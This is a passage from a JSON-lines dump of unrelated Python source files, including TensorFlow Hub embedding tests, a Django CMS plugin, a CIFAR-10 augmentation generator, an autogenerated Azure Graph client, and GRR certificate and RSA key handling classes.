}\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text_a\",\n self.spec,\n combiner=\"mean\",\n default_value=\"__UNKNOWN__\",\n trainable=False),\n hub.sparse_text_embedding_column(\n \"text_b\",\n self.spec,\n combiner=\"mean\",\n default_value=\"__UNKNOWN__\",\n trainable=False),\n ]\n input_layer = tf_v1.feature_column.input_layer(features, feature_columns)\n with tf_v1.train.MonitoredSession() as sess:\n output = sess.run(input_layer)\n self.assertAllEqual(\n output,\n [[3, 3.5, 4, 4.5, 0.5, 1, 1.5, 2], [1, 2, 3, 4, 0, 0, 0, 0]])\n # ([1, 2, 3, 4] + [5, 5, 5, 5])/2 extend ([1, 2, 3, 4] + [0, 0, 0, 0])/2\n # [1, 2, 3, 4] extend [0, 0, 0, 0]\n\n def testTrainableEmbeddingColumn(self):\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=None,\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=[\"hello world\", \"pair-programming\"],\n indices=[[0, 0], [1, 0]],\n dense_shape=[2, 2])\n\n target = [[1, 1, 1, 1], [4, 3, 2, 1]]\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n loss = tf_v1.losses.mean_squared_error(input_layer, target)\n optimizer = tf_v1.train.GradientDescentOptimizer(learning_rate=0.97)\n train_op = optimizer.minimize(loss)\n\n with tf_v1.train.MonitoredSession() as sess:\n self.assertAllEqual(sess.run(input_layer), [[1, 2, 3, 4], [5, 5, 5, 5]])\n for _ in range(10):\n sess.run(train_op)\n self.assertAllClose(sess.run(input_layer), target, atol=0.5)\n\n def testEmptySparseTensorBatch(self):\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=\"default\",\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=tf_v1.constant([], dtype=tf_v1.string, shape=[0]),\n indices=tf_v1.constant([], dtype=tf_v1.int64, shape=[0, 2]),\n dense_shape=[3, 0])\n\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n with tf_v1.train.MonitoredSession() as sess:\n embeddings = sess.run(input_layer)\n self.assertAllEqual(embeddings,\n [[0, 0, 0, 0], [0, 0, 0, 0], [0, 0, 0, 0]])\n\n def testEmptySparseTensorRow(self):\n feature_columns = [\n hub.sparse_text_embedding_column(\n \"text\",\n self.spec,\n combiner=\"mean\",\n default_value=\"default\",\n trainable=True),\n ]\n\n with tf.Graph().as_default():\n text = tf.SparseTensor(\n values=tf_v1.constant([\"hello world\"], dtype=tf_v1.string, shape=[1]),\n indices=tf_v1.constant([[0, 0]], dtype=tf_v1.int64, shape=[1, 2]),\n dense_shape=[2, 1])\n\n input_layer = tf_v1.feature_column.input_layer({\"text\": text},\n feature_columns)\n\n with tf_v1.train.MonitoredSession() as sess:\n embeddings = sess.run(input_layer)\n self.assertAllEqual(embeddings, [[1, 2, 3, 4], [0, 0, 0, 0]])\n\n\nif __name__ == \"__main__\":\n tf.test.main()\n"} {"ext": "py", "sha": "1a2fcd9d775da7ad6e0fbffbd09813c027c38413", "content": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.template import TemplateDoesNotExist\nfrom django.template.loader import select_template\nfrom cms.plugin_base import CMSPluginBase\nfrom cms.plugin_pool import plugin_pool\n\nfrom js_services import models, forms\nfrom .constants import (\n IS_THERE_COMPANIES,\n)\nif IS_THERE_COMPANIES:\n from js_companies.models import Company\n\n\n@plugin_pool.register_plugin\nclass RelatedServicesPlugin(CMSPluginBase):\n TEMPLATE_NAME = 'js_services/plugins/related_services__%s.html'\n module = 'Services'\n render_template = 'js_services/plugins/related_services.html'\n name = _('Related Services')\n model = models.RelatedServicesPlugin\n form = forms.RelatedServicesPluginForm\n\n def render(self, context, instance, placeholder):\n request = context.get('request')\n context['instance'] = instance\n context['title'] = instance.title\n context['icon'] = instance.icon\n context['image'] = instance.image\n context['background_color'] = instance.background_color\n context['full_screen'] = instance.full_screen\n\n qs = instance.related_services.published()\n related_sections = instance.related_sections.all()\n related_people = instance.related_people.all()\n if IS_THERE_COMPANIES:\n related_companies = instance.related_companies.all()\n related_categories = instance.related_categories.all()\n\n if not qs.exists():\n selected = False\n qs = models.Service.objects.published().distinct()\n if related_sections.exists():\n selected = True\n qs = qs.filter(sections__in=related_sections)\n if related_people.exists():\n selected = True\n qs = qs.filter(person__in=related_people)\n if IS_THERE_COMPANIES and related_companies.exists():\n selected = True\n qs = qs.filter(companies__in=related_companies)\n if related_categories.exists():\n selected = True\n qs = qs.filter(categories__in=related_categories)\n if not selected:\n qs = models.Service.objects.none()\n context['related_services_all'] = qs\n context['related_services'] = qs[:int(instance.count)]\n\n return context\n\n def get_render_template(self, context, instance, placeholder):\n if instance.layout:\n template = self.TEMPLATE_NAME % instance.layout\n try:\n select_template([template])\n return template\n except TemplateDoesNotExist:\n pass\n return self.render_template\n\n def save_model(self, request, obj, form, change):\n super().save_model(request, obj, form, change)\n if IS_THERE_COMPANIES:\n obj.related_companies.set(Company.objects.filter(pk__in=form.cleaned_data.get('related_companies')))\n"} {"ext": "py", "sha": "1a2fcdd43365079c42475bbfe897908520e51365", "content": "# -*- encoding: utf-8 -*-\n\ndef log(*args, **kwargs):\n print(args, kwargs)"} {"ext": "py", "sha": "1a2fcde7cf410f5cc6185fb6821140640453ed7a", "content": "import sys\nimport yaml\nimport os\n\ndef getcsv(argv):\n\tif len(argv) == 0:\n\t\tprint(\"No input files given.\")\n\telse:\n\t\tflag = True\n\t\tout_string = ''\n\t\tkeys = ['L1c', 'L1b', 'L1a', 'L2c', 'L2b', 'L2a', 'L2prf',\n\t\t\t\t'TLBe', 'TLBp', 'TLBa', 'IPC',\n\t\t\t\t'Total_Instructions', 'Total_Cycles',\n\t\t\t\t'L1-Total-Misses', 'L1-Load-Misses', 'L1-Store-Misses',\n\t\t\t\t'L2-Total-Misses', 'L2-Load-Misses', 'L2-Store-Misses',\n\t\t\t\t'Tlb-Total-Misses', 'Tlb-Load-Misses', 'Tlb-Store-Misses']\n\t\theader = ''\n\t\tfor key in keys:\n\t\t\theader += key\n\t\t\theader += ';'\n\t\tout_string = out_string + header + '\\n'\n\t\tfor i in range(0, len(argv)):\n\t\t\tif os.path.exists(argv[i]):\n\t\t\t\twith open(argv[i], 'r') as in_file:\n\t\t\t\t\tl_key = ''\n\t\t\t\t\ttry:\n\t\t\t\t\t\tin_stream = yaml.safe_load(in_file)\n\t\t\t\t\t\tline = ''\n\t\t\t\t\t\tfor key in keys:\n\t\t\t\t\t\t\tl_key = key\n\t\t\t\t\t\t\tline += str(in_stream[key])\n\t\t\t\t\t\t\tline += ';'\n\t\t\t\t\t\tout_string = out_string + line + '\\n'\n\t\t\t\t\texcept KeyError:\n\t\t\t\t\t\tsys.stderr.write(\"--Error-- {} does not contain key: {}.\\n\".format(argv[i], l_key))\n\t\t\t\t\t\tflag = False\n\t\t\telse:\n\t\t\t\tsys.stderr.write(\"File {} does not exist.\".format(argv[i]))\n\t\tif flag:\n\t\t\tprint('Process finished without errors.')\n\t\t\treturn out_string\n\t\telse:\n\t\t\tsys.stderr.write('Process finished with errors.' + '\\n')\n\t\t\treturn False\n"} {"ext": "py", "sha": "1a2fce9e7dc4970a5b9f7925ba30476dbc1fe827", "content": "import random\nimport numpy as np\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\n\nfrom .auto_augment import cutout, apply_policy\nfrom .utils import *\n\n\nclass Cifar10ImageDataGenerator:\n def __init__(self, args):\n self.datagen = ImageDataGenerator(width_shift_range=0.1, height_shift_range=0.1, fill_mode='constant', cval=0, horizontal_flip=True)\n\n self.means = np.array([0.4914009 , 0.48215896, 0.4465308])\n self.stds = np.array([0.24703279, 0.24348423, 0.26158753])\n\n self.args = args\n if args.auto_augment:\n self.policies = [\n ['Invert', 0.1, 7, 'Contrast', 0.2, 6],\n ['Rotate', 0.7, 2, 'TranslateX', 0.3, 9],\n ['Sharpness', 0.8, 1, 'Sharpness', 0.9, 3],\n ['ShearY', 0.5, 8, 'TranslateY', 0.7, 9],\n ['AutoContrast', 0.5, 8, 'Equalize', 0.9, 2],\n ['ShearY', 0.2, 7, 'Posterize', 0.3, 7],\n ['Color', 0.4, 3, 'Brightness', 0.6, 7],\n ['Sharpness', 0.3, 9, 'Brightness', 0.7, 9],\n ['Equalize', 0.6, 5, 'Equalize', 0.5, 1],\n ['Contrast', 0.6, 7, 'Sharpness', 0.6, 5],\n ['Color', 0.7, 7, 'TranslateX', 0.5, 8],\n ['Equalize', 0.3, 7, 'AutoContrast', 0.4, 8],\n ['TranslateY', 0.4, 3, 'Sharpness', 0.2, 6],\n ['Brightness', 0.9, 6, 'Color', 0.2, 8],\n ['Solarize', 0.5, 2, 'Invert', 0, 0.3],\n ['Equalize', 0.2, 0, 'AutoContrast', 0.6, 0],\n ['Equalize', 0.2, 8, 'Equalize', 0.6, 4],\n ['Color', 0.9, 9, 'Equalize', 0.6, 6],\n ['AutoContrast', 0.8, 4, 'Solarize', 0.2, 8],\n ['Brightness', 0.1, 3, 'Color', 0.7, 0],\n ['Solarize', 0.4, 5, 'AutoContrast', 0.9, 3],\n ['TranslateY', 0.9, 9, 'TranslateY', 0.7, 9],\n ['AutoContrast', 0.9, 2, 'Solarize', 0.8, 3],\n ['Equalize', 0.8, 8, 'Invert', 0.1, 3],\n ['TranslateY', 0.7, 9, 'AutoContrast', 0.9, 1],\n ]\n\n def standardize(self, x):\n x = x.astype('float32') / 255\n\n means = self.means.reshape(1, 1, 1, 3)\n stds = self.stds.reshape(1, 1, 1, 3)\n\n x -= means\n x /= (stds + 1e-6)\n\n return x\n\n def flow(self, x, y=None, batch_size=32, shuffle=True, sample_weight=None,\n seed=None, save_to_dir=None, save_prefix='', save_format='png', subset=None):\n batches = self.datagen.flow(x, y, batch_size, shuffle, sample_weight,\n seed, save_to_dir, save_prefix, save_format, subset)\n\n while True:\n x_batch, y_batch = next(batches)\n\n if self.args.cutout:\n for i in range(x_batch.shape[0]):\n x_batch[i] = cutout(x_batch[i])\n\n if self.args.auto_augment:\n x_batch = x_batch.astype('uint8')\n for i in range(x_batch.shape[0]):\n x_batch[i] = apply_policy(x_batch[i], self.policies[random.randrange(len(self.policies))])\n\n x_batch = self.standardize(x_batch)\n\n yield x_batch, y_batch\n\n\ndef main():\n import argparse\n import matplotlib.pyplot as plt\n from tensorflow.keras.datasets import cifar10\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--cutout', default=True, type=str2bool)\n parser.add_argument('--auto-augment', default=True, type=str2bool)\n args = parser.parse_args()\n\n datagen = Cifar10ImageDataGenerator(args)\n\n (x_train, y_train), (x_test, y_test) = cifar10.load_data()\n\n for imgs, _ in datagen.flow(x_train, y_train):\n plt.imshow(imgs[0].astype('uint8'))\n plt.axis('off')\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n"} {"ext": "py", "sha": "1a2fcead660347520d44efaf9167beda4251c435", "content": "# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------\nfrom typing import TYPE_CHECKING\nimport warnings\n\nfrom azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error\nfrom azure.core.pipeline import PipelineResponse\nfrom azure.core.pipeline.transport import HttpRequest, HttpResponse\nfrom azure.mgmt.core.exceptions import ARMErrorFormat\n\nfrom .. import models\n\nif TYPE_CHECKING:\n # pylint: disable=unused-import,ungrouped-imports\n from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar\n\n T = TypeVar('T')\n ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]\n\nclass UsersTodoListsOperations(object):\n \"\"\"UsersTodoListsOperations operations.\n\n You should not instantiate this class directly. Instead, you should create a Client instance that\n instantiates it for you and attaches it as an attribute.\n\n :ivar models: Alias to model classes used in this operation group.\n :type models: ~users_functions.models\n :param client: Client for service requests.\n :param config: Configuration of service client.\n :param serializer: An object model serializer.\n :param deserializer: An object model deserializer.\n \"\"\"\n\n models = models\n\n def __init__(self, client, config, serializer, deserializer):\n self._client = client\n self._serialize = serializer\n self._deserialize = deserializer\n self._config = config\n\n def delta(\n self,\n user_id, # type: str\n **kwargs # type: Any\n ):\n # type: (...) -> List[\"models.MicrosoftGraphTodoTaskList\"]\n \"\"\"Invoke function delta.\n\n Invoke function delta.\n\n :param user_id: key: id of user.\n :type user_id: str\n :keyword callable cls: A custom type or function that will be passed the direct response\n :return: list of MicrosoftGraphTodoTaskList, or the result of cls(response)\n :rtype: list[~users_functions.models.MicrosoftGraphTodoTaskList]\n :raises: ~azure.core.exceptions.HttpResponseError\n \"\"\"\n cls = kwargs.pop('cls', None) # type: ClsType[List[\"models.MicrosoftGraphTodoTaskList\"]]\n error_map = {\n 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError\n }\n error_map.update(kwargs.pop('error_map', {}))\n accept = \"application/json\"\n\n # Construct URL\n url = self.delta.metadata['url'] # type: ignore\n path_format_arguments = {\n 'user-id': self._serialize.url(\"user_id\", user_id, 'str'),\n }\n url = self._client.format_url(url, **path_format_arguments)\n\n # Construct parameters\n query_parameters = {} # type: Dict[str, Any]\n\n # Construct headers\n header_parameters = {} # type: Dict[str, Any]\n header_parameters['Accept'] = self._serialize.header(\"accept\", accept, 'str')\n\n request = self._client.get(url, query_parameters, header_parameters)\n pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)\n response = pipeline_response.http_response\n\n if response.status_code not in [200]:\n map_error(status_code=response.status_code, response=response, error_map=error_map)\n error = self._deserialize(models.OdataError, response)\n raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)\n\n deserialized = self._deserialize('[MicrosoftGraphTodoTaskList]', pipeline_response)\n\n if cls:\n return cls(pipeline_response, deserialized, {})\n\n return deserialized\n delta.metadata = {'url': '/users/{user-id}/todo/lists/microsoft.graph.delta()'} # type: ignore\n"} {"ext": "py", "sha": "1a2fd193df9535e53e3f04f4eb03da31d7714631", "content": "#!/usr/bin/env python\n\"\"\"Implementation of various cryptographic types.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom __future__ import unicode_literals\n\nimport binascii\nimport hashlib\nimport logging\nimport os\n\n\nfrom cryptography import exceptions\nfrom cryptography import x509\nfrom cryptography.hazmat.backends import openssl\nfrom cryptography.hazmat.primitives import ciphers\nfrom cryptography.hazmat.primitives import constant_time\nfrom cryptography.hazmat.primitives import hashes\nfrom cryptography.hazmat.primitives import hmac\nfrom cryptography.hazmat.primitives import padding as sym_padding\nfrom cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.primitives.ciphers import algorithms\nfrom cryptography.hazmat.primitives.ciphers import modes\nfrom cryptography.hazmat.primitives.kdf import pbkdf2\nfrom cryptography.x509 import oid\n\nfrom future.builtins import str\nfrom future.utils import string_types\nfrom typing import Text\n\nfrom grr_response_core.lib import config_lib\nfrom grr_response_core.lib import rdfvalue\nfrom grr_response_core.lib import type_info\nfrom grr_response_core.lib import utils\nfrom grr_response_core.lib.rdfvalues import standard as rdf_standard\nfrom grr_response_core.lib.rdfvalues import structs as rdf_structs\nfrom grr_response_core.lib.util import precondition\nfrom grr_response_core.lib.util import random\nfrom grr_response_proto import jobs_pb2\n\n\nclass Error(Exception):\n pass\n\n\nclass VerificationError(Error):\n pass\n\n\nclass InvalidSignature(Error):\n pass\n\n\nclass CipherError(rdfvalue.DecodeError):\n \"\"\"Raised when decryption failed.\"\"\"\n\n\nclass Certificate(rdf_structs.RDFProtoStruct):\n protobuf = jobs_pb2.Certificate\n\n\nclass RDFX509Cert(rdfvalue.RDFPrimitive):\n \"\"\"X509 certificates used to communicate with this client.\"\"\"\n\n def __init__(self, initializer=None, age=None):\n super(RDFX509Cert, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, x509.Certificate):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def GetRawCertificate(self):\n return self._value\n\n def GetCN(self):\n subject = self._value.subject\n try:\n cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)\n if len(cn_attributes) > 1:\n raise rdfvalue.DecodeError(\"Cert has more than 1 CN entries.\")\n cn_attribute = cn_attributes[0]\n except IndexError:\n raise rdfvalue.DecodeError(\"Cert has no CN\")\n\n return cn_attribute.value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def GetSerialNumber(self):\n return self._value.serial_number\n\n def GetIssuer(self):\n return self._value.issuer\n\n def ParseFromString(self, string):\n try:\n self._value = x509.load_pem_x509_certificate(\n string, backend=openssl.backend)\n except (ValueError, TypeError) as e:\n raise rdfvalue.DecodeError(\"Invalid certificate %s: %s\" % (string, e))\n # This can also raise if there isn't exactly one CN entry.\n self.GetCN()\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(encoding=serialization.Encoding.PEM)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def __str__(self):\n return self.SerializeToString()\n\n def Verify(self, public_key):\n \"\"\"Verifies the certificate using the given key.\n\n Args:\n public_key: The public key to use.\n\n Returns:\n True: Everything went well.\n\n Raises:\n VerificationError: The certificate did not verify.\n \"\"\"\n # TODO(amoser): We have to do this manually for now since cryptography does\n # not yet support cert verification. There is PR 2460:\n # https://github.com/pyca/cryptography/pull/2460/files\n # that will add it, once it's in we should switch to using this.\n\n # Note that all times here are in UTC.\n now = rdfvalue.RDFDatetime.Now().AsDatetime()\n if now > self._value.not_valid_after:\n raise VerificationError(\"Certificate expired!\")\n if now < self._value.not_valid_before:\n raise VerificationError(\"Certificate not yet valid!\")\n\n public_key.Verify(\n self._value.tbs_certificate_bytes,\n self._value.signature,\n hash_algorithm=self._value.signature_hash_algorithm)\n return True\n\n @classmethod\n def ClientCertFromCSR(cls, csr):\n \"\"\"Creates a new cert for the given common name.\n\n Args:\n csr: A CertificateSigningRequest.\n Returns:\n The signed cert.\n \"\"\"\n builder = x509.CertificateBuilder()\n # Use the client CN for a cert serial_id. This will ensure we do\n # not have clashing cert id.\n common_name = csr.GetCN()\n serial = int(common_name.split(\".\")[1], 16)\n builder = builder.serial_number(serial)\n builder = builder.subject_name(\n x509.Name(\n [x509.NameAttribute(oid.NameOID.COMMON_NAME, str(common_name))]))\n\n now = rdfvalue.RDFDatetime.Now()\n now_plus_year = now + rdfvalue.Duration(\"52w\")\n builder = builder.not_valid_after(now_plus_year.AsDatetime())\n now_minus_ten = now - rdfvalue.Duration(\"10s\")\n builder = builder.not_valid_before(now_minus_ten.AsDatetime())\n # TODO(user): dependency loop with\n # grr/core/grr_response_core/config/client.py.\n # pylint: disable=protected-access\n ca_cert = config_lib._CONFIG[\"CA.certificate\"]\n # pylint: enable=protected-access\n builder = builder.issuer_name(ca_cert.GetIssuer())\n builder = builder.public_key(csr.GetPublicKey().GetRawPublicKey())\n\n # TODO(user): dependency loop with\n # grr/core/grr_response_core/config/client.py.\n # pylint: disable=protected-access\n ca_key = config_lib._CONFIG[\"PrivateKeys.ca_key\"]\n # pylint: enable=protected-access\n\n return RDFX509Cert(\n builder.sign(\n private_key=ca_key.GetRawPrivateKey(),\n algorithm=hashes.SHA256(),\n backend=openssl.backend))\n\n\nclass CertificateSigningRequest(rdfvalue.RDFValue):\n \"\"\"A CSR Rdfvalue.\"\"\"\n\n def __init__(self,\n initializer=None,\n common_name=None,\n private_key=None,\n age=None):\n super(CertificateSigningRequest, self).__init__(\n initializer=initializer, age=age)\n if self._value is None:\n if isinstance(initializer, x509.CertificateSigningRequest):\n self._value = initializer\n elif isinstance(initializer, string_types):\n self.ParseFromString(initializer)\n elif common_name and private_key:\n self._value = x509.CertificateSigningRequestBuilder().subject_name(\n x509.Name(\n [x509.NameAttribute(oid.NameOID.COMMON_NAME,\n str(common_name))])).sign(\n private_key.GetRawPrivateKey(),\n hashes.SHA256(),\n backend=openssl.backend)\n elif initializer is not None:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def ParseFromString(self, csr_as_pem):\n self._value = x509.load_pem_x509_csr(csr_as_pem, backend=openssl.backend)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(serialization.Encoding.PEM)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def __str__(self):\n return self.SerializeToString()\n\n def GetCN(self):\n subject = self._value.subject\n try:\n cn_attributes = subject.get_attributes_for_oid(oid.NameOID.COMMON_NAME)\n if len(cn_attributes) > 1:\n raise rdfvalue.DecodeError(\"CSR has more than 1 CN entries.\")\n cn_attribute = cn_attributes[0]\n except IndexError:\n raise rdfvalue.DecodeError(\"CSR has no CN\")\n\n return cn_attribute.value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def Verify(self, public_key):\n public_key.Verify(\n self._value.tbs_certrequest_bytes,\n self._value.signature,\n hash_algorithm=self._value.signature_hash_algorithm)\n return True\n\n\nclass RSAPublicKey(rdfvalue.RDFPrimitive):\n \"\"\"An RSA public key.\"\"\"\n\n def __init__(self, initializer=None, age=None):\n super(RSAPublicKey, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, rsa.RSAPublicKey):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n elif isinstance(initializer, Text):\n self.ParseFromString(initializer.encode(\"ascii\"))\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def GetRawPublicKey(self):\n return self._value\n\n def ParseFromString(self, pem_string):\n precondition.AssertType(pem_string, bytes)\n try:\n self._value = serialization.load_pem_public_key(\n pem_string, backend=openssl.backend)\n except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:\n raise type_info.TypeValueError(\"Public key invalid: %s\" % e)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.public_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PublicFormat.SubjectPublicKeyInfo)\n\n def GetN(self):\n return self._value.public_numbers().n\n\n def __str__(self):\n return self.SerializeToString()\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def KeyLen(self):\n if self._value is None:\n return 0\n return self._value.key_size\n\n def Encrypt(self, message):\n if self._value is None:\n raise ValueError(\"Can't Encrypt with empty key.\")\n\n try:\n return self._value.encrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None))\n except ValueError as e:\n raise CipherError(e)\n\n def Verify(self, message, signature, hash_algorithm=None):\n \"\"\"Verifies a given message.\"\"\"\n # This method accepts both PSS and PKCS1v15 padding. PSS is preferred but\n # old clients only support PKCS1v15.\n\n if hash_algorithm is None:\n hash_algorithm = hashes.SHA256()\n\n last_e = None\n for padding_algorithm in [\n padding.PSS(\n mgf=padding.MGF1(hash_algorithm),\n salt_length=padding.PSS.MAX_LENGTH),\n padding.PKCS1v15()\n ]:\n try:\n self._value.verify(signature, message, padding_algorithm,\n hash_algorithm)\n return True\n\n except exceptions.InvalidSignature as e:\n last_e = e\n\n raise VerificationError(last_e)\n\n\nclass RSAPrivateKey(rdfvalue.RDFPrimitive):\n \"\"\"An RSA private key.\"\"\"\n\n def __init__(self, initializer=None, age=None, allow_prompt=None):\n self.allow_prompt = allow_prompt\n super(RSAPrivateKey, self).__init__(initializer=initializer, age=age)\n if self._value is None and initializer is not None:\n if isinstance(initializer, rsa.RSAPrivateKey):\n self._value = initializer\n elif isinstance(initializer, bytes):\n self.ParseFromString(initializer)\n elif isinstance(initializer, Text):\n self.ParseFromString(initializer.encode(\"ascii\"))\n else:\n raise rdfvalue.InitializeError(\n \"Cannot initialize %s from %s.\" % (self.__class__, initializer))\n\n def ParseFromHumanReadable(self, string):\n precondition.AssertType(string, Text)\n self.ParseFromString(string.encode(\"ascii\"))\n\n def GetRawPrivateKey(self):\n return self._value\n\n def GetPublicKey(self):\n return RSAPublicKey(self._value.public_key())\n\n def Sign(self, message, use_pss=False):\n \"\"\"Sign a given message.\"\"\"\n precondition.AssertType(message, bytes)\n\n # TODO(amoser): This should use PSS by default at some point.\n if not use_pss:\n padding_algorithm = padding.PKCS1v15()\n else:\n padding_algorithm = padding.PSS(\n mgf=padding.MGF1(hashes.SHA256()), salt_length=padding.PSS.MAX_LENGTH)\n\n return self._value.sign(message, padding_algorithm, hashes.SHA256())\n\n def Decrypt(self, message):\n if self._value is None:\n raise ValueError(\"Can't Decrypt with empty key.\")\n\n try:\n return self._value.decrypt(\n message,\n padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None))\n except ValueError as e:\n raise CipherError(e)\n\n @classmethod\n def GenerateKey(cls, bits=2048, exponent=65537):\n key = rsa.generate_private_key(\n public_exponent=exponent, key_size=bits, backend=openssl.backend)\n return cls(key)\n\n def ParseFromString(self, pem_string):\n precondition.AssertType(pem_string, bytes)\n try:\n self._value = serialization.load_pem_private_key(\n pem_string, password=None, backend=openssl.backend)\n return\n except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:\n\n if \"private key is encrypted\" not in str(e):\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n\n # pylint: disable=g-explicit-bool-comparison, g-equals-none\n\n # The private key is passphrase protected, we need to see if we are\n # allowed to ask the user.\n #\n # If allow_prompt is False, we are explicitly told that we are not.\n if self.allow_prompt == False:\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n\n # allow_prompt was not set, we use the context we are in to see if it\n # makes sense to ask.\n elif self.allow_prompt == None:\n # TODO(user): dependency loop with\n # core/grr_response_core/grr/config/client.py.\n # pylint: disable=protected-access\n if \"Commandline Context\" not in config_lib._CONFIG.context:\n raise type_info.TypeValueError(\"Private key invalid: %s\" % e)\n # pylint: enable=protected-access\n\n # pylint: enable=g-explicit-bool-comparison, g-equals-none\n\n try:\n # The private key is encrypted and we can ask the user for the passphrase.\n password = utils.PassphraseCallback()\n self._value = serialization.load_pem_private_key(\n pem_string, password=password, backend=openssl.backend)\n except (TypeError, ValueError, exceptions.UnsupportedAlgorithm) as e:\n raise type_info.TypeValueError(\"Unable to load private key: %s\" % e)\n\n def ParseFromDatastore(self, value):\n precondition.AssertType(value, bytes)\n self.ParseFromString(value)\n\n def SerializeToString(self):\n if self._value is None:\n return \"\"\n return self._value.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.NoEncryption())\n\n def __str__(self):\n digest = hashlib.sha256(self.AsPEM()).hexdigest()\n return \"%s (%s)\" % (self.__class__.__name__, digest)\n\n def AsPEM(self):\n return self.SerializeToString()\n\n def AsPassphraseProtectedPEM(self, passphrase):\n if self._value is None:\n return \"\"\n return self._value.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.BestAvailableEncryption(passphrase))\n\n def KeyLen(self):\n if self._value is None:\n return 0\n return self._value.key_size\n\n\n# TODO(amoser): Get rid of those.\n# Conserve old names for backwards compatibility.\nclass PEMPrivateKey(RSAPrivateKey):\n pass\n\n\nclass PEMPublicKey(RSAPublicKey):\n pass\n\n\nclass Hash(rdf_structs.RDFProtoStruct):\n \"\"\"A hash object containing multiple digests.\"\"\"\n protobuf = jobs_pb2.Hash\n rdf_deps = [\n rdf_standard.AuthenticodeSignedData,\n rdfvalue.HashDigest,\n ]\n\n\nclass SignedBlob(rdf_structs.RDFProtoStruct):\n \"\"\"A signed blob.\n\n The client can receive and verify a signed blob (e.g. driver or executable\n binary). Once verified, the client may execute this.\n \"\"\"\n protobuf = jobs_pb2.SignedBlob\n\n def Verify(self, public_key):\n \"\"\"Verify the data in this blob.\n\n Args:\n public_key: The public key to use for verification.\n\n Returns:\n True when verification succeeds.\n\n Raises:\n rdfvalue.DecodeError if the data is not suitable verified.\n \"\"\"\n if self.digest_type != self.HashType.SHA256:\n raise rdfvalue.DecodeError(\"Unsupported digest.\")\n if self.signature_type not in [\n self.SignatureType.RSA_PKCS1v15, self.SignatureType.RSA_PSS\n ]:\n raise rdfvalue.DecodeError(\"Unsupported signature type.\")\n\n try:\n public_key.Verify(self.data, self.signature)\n except InvalidSignature as e:\n raise rdfvalue.DecodeError(\"Could not verify blob. Error: %s\" % e)\n\n return True\n\n def Sign(self, data, signing_key, verify_key=None):\n \"\"\"Use the data to sign this 